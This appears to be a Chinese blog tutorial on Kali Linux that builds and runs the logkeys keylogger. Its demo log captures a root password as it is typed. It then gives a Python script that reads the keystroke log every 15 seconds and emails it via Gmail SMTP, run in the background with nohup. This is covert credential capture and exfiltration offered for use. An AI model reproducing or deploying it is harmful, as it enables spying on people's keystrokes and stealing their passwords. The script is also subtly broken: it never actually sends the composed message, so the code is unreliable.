logkeys是一个键盘记录软件,他的源代码托管在google code上,主页为https://code.google.com/p/logkeys/
测试环境是是Kali Linux
首先下载logkeys
解压
[email protected]:~# tar -zxvf logkeys* [email protected]:~# cd logkeys* |
看一下INSTALL文件
[email protected]:~/Desktop/logkeys-0.1.1a# cat INSTALL =============================================================================== logkeys keylogger - instalation instructions =============================================================================== Provided your GNU/Linux distribution doesn't include logkeys package in its repositories, manual installation of logkeys from source is as easy as : $ tar xvzf logkeys-0.1.0.tar.gz # to extract the logkeys archive $ cd logkeys-0.1.0/build # move to build directory to build there $ ../configure # invoke configure from parent directory $ make # make compiles what it needs to compile ( become superuser now ) # you need root to install in system dir # make install # installs binaries, manuals and scripts That's it. To ever uninstall logkeys, remove accompanying scripts and manuals, issue # make uninstall # in the same logkeys-0.1.0/build dir from before See README file for usage instructions and notes. [email protected]:~/Desktop/logkeys-0.1.1a# |
帮助文档写的很清楚了,接下来是编译
[email protected]:~/logkeys-0.1.1a# cd build [email protected]:~/logkeys-0.1.1a/build# ls [email protected]:~/logkeys-0.1.1a/build# //linux编译的经典三部曲 [email protected]:~/Desktop/logkeys-0.1.1a/build# ../configure [email protected]:~/Desktop/logkeys-0.1.1a/build# make [email protected]:~/Desktop/logkeys-0.1.1a/build# make install [email protected]:~/Desktop/logkeys-0.1.1a/build# ls config.h config.log config.status Makefile man scripts src stamp-h1 [email protected]:~/Desktop/logkeys-0.1.1a/build# cd src [email protected]:~/Desktop/logkeys-0.1.1a/build/src# ls llk llkk llkk.o llk.o logkeys logkeys.o Makefile |
logkeys就是生成的二进制文件
[email protected]:~/Desktop/logkeys-0.1.1a/build/src# cp logkeys /bin [email protected]:~/Desktop/logkeys-0.1.1a/build/src# ls llk llkk llkk.o llk.o logkeys logkeys.o Makefile [email protected]:~/Desktop/logkeys-0.1.1a/build/src# logjeys -h bash: logjeys: 未找到命令 [email protected]:~/Desktop/logkeys-0.1.1a/build/src# logkeys -h logkeys: invalid option -- 'h' Usage: logkeys [OPTION]... Log depressed keyboard keys. -s, --start start logging keypresses -m, --keymap=FILE use keymap FILE -o, --output=FILE log output to FILE [/ var /log/logkeys.log] -u, --us-keymap use en_US keymap instead of configured default -k, --kill kill running logkeys process -d, --device=FILE input event device [eventX from /dev/input/] -?, --help print this help screen --export-keymap=FILE export configured keymap to FILE and exit --no-func-keys log only character keys --no-timestamps don't prepend timestamps to log file lines --post-http=URL POST log to URL as multipart/form-data file --post-size=SIZE post log file when size equals SIZE [500k] Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log logkeys -s -d event6 logkeys -k logkeys version: 0.1.1a logkeys homepage: <http: //code.google.com/p/logkeys/> [email protected]:~/Desktop/logkeys-0.1.1a/build/src# |
在logkeys的参数中,最麻烦的是”-m”键盘布局选项
我使用默认的键盘布局文件,得到的结果如下
[email protected]:~# logkeys -k [email protected]:~# logkeys -s -o /root/.logkeys [email protected]:~# ls Desktop Downloads Python [email protected]on:~# cat .logkeys Logging started ... 2013-11-13 08:36:57+0800 > ka 2013-11-13 08:37:02+0800 > x܂t ,kofjeya [email protected]:~# |
很明显的键位偏移了,可以使用”-u”参数指定标准美式键盘
[email protected]:~# logkeys -s -u -o .test.txt [email protected]:~# ls Desktop Downloads Python [email protected]:~# passwd root 输入新的 UNIX 密码: 重新输入新的 UNIX 密码: passwd:已成功更新密码 [email protected]:~# cat .test.txt Logging started ... 2013-11-13 08:42:52+0800 > ls 2013-11-13 08:42:54+0800 > cat .test.txt 2013-11-13 08:42:59+0800 > clear 2013-11-13 08:43:09+0800 > ls 2013-11-13 08:43:10+0800 > passwd root 2013-11-13 08:43:16+0800 > fuck<BckSp><BckSp><BckSp><BckSp><BckSp>f4ck 2013-11-13 08:43:29+0800 > f4ck 2013-11-13 08:43:31+0800 > cat .text<BckSp><BckSp>st.txt [email protected]:~# |
搞定,如果这么结束的话就没意思了,接下来的才是重点
#!/usr/bin/env python #coding=utf-8 import smtplib from email.Message import Message import time import optparse import sched schedular=sched.scheduler(time.time,time.sleep) def sendMail(theEmail, thePasswd): systemTime=time. strftime ( '%Y-%m-%d-%T' ,time.localtime(time.time())) try : fileObj=open( "/root/.logkeys" , "r" ) # "/root/.logkeys" 是键盘记录的输出文件,根据输出文件的不同适当的修改 content=fileObj.read() except: print "Cannot read file\n" exit () message = Message() message[ 'Subject' ] = 'Log Keys' #邮件标题 message[ 'To' ] = theEmail message.set_payload( "当前时间" +systemTime+ "\n" +content) #邮件正文 msg = message.as_string() smtp = smtplib.SMTP( "smtp.gmail.com" , port=587, timeout=20) #sm.set_debuglevel(1) #开启debug模式 smtp.starttls() #使用安全连接 smtp.login(theEmail, thePasswd) time.sleep(5) #避免邮件没有发送完成就调用了quit() smtp.quit() def perform(inc, theEmail, thePasswd): schedular.enter(inc,0,perform,(inc,theEmail, thePasswd)) sendMail(theEmail, thePasswd) def myMain(inc, theEmail, thePasswd): schedular.enter(0,0,perform,(inc,theEmail, thePasswd)) schedular.run() if __name__== "__main__" : optObj=optparse.OptionParser() optObj.add_option( "-u" , dest= "user" , help= "Gmail account" ) optObj.add_option( "-p" , dest= "passwd" , help= "Gmail Passwd" ) (options, args)=optObj.parse_args() emailName=options.user emailPasswd=options.passwd myMain(15, emailName, emailPasswd) //15表示的是相隔时间,可以根据自己的需求设定 |
该脚本的作用是定时读取logkeys的输出文件,并发送到gmail邮箱。脚本的使用也很简单
[email protected]:~/Python# python mail.py -h Usage: mail.py [options] Options: -h, --help show this help message and exit -u USER Gmail account -p PASSWD Gmail Passwd [email protected]:~/Python# ls file.txt mail.py nohup.out [email protected]:~/Python# nohup ./mail.py -u [email protected] -p passwd & [1] 7499 [email protected]:~/Python# nohup: 忽略输入并把输出追加到 "nohup.out" |